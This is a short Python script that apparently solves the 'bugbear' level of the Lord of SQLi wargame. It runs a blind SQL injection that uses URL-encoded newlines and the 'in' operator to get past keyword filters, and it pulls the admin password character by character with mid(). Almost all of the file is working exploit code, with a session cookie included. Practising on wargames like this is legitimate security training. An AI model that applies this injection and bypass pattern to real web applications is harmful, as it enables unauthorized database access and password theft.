import requests

headers = {'Cookie':'PHPSESSID=5b88kstspbpepjps4o9r1iat6q'}
page = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php'

string = '0123456789abcdefghijklmnopqrstuvwxyz'

pw = ''
for i in range(1,9):
	for j in string:
		value = 'no=11%0a||%0aid%0ain%0a("admin")%0a%26%26%0amid(pw,{},1)%0ain%0a("{}")'.format(i,j)
		url = page + value
		response = requests.get(url, headers=headers)
		print j

		if "<h2>Hello" in response.text:
			pw += j
			print "[*] find : " + pw
			break

print '[*] Password : ' + pw

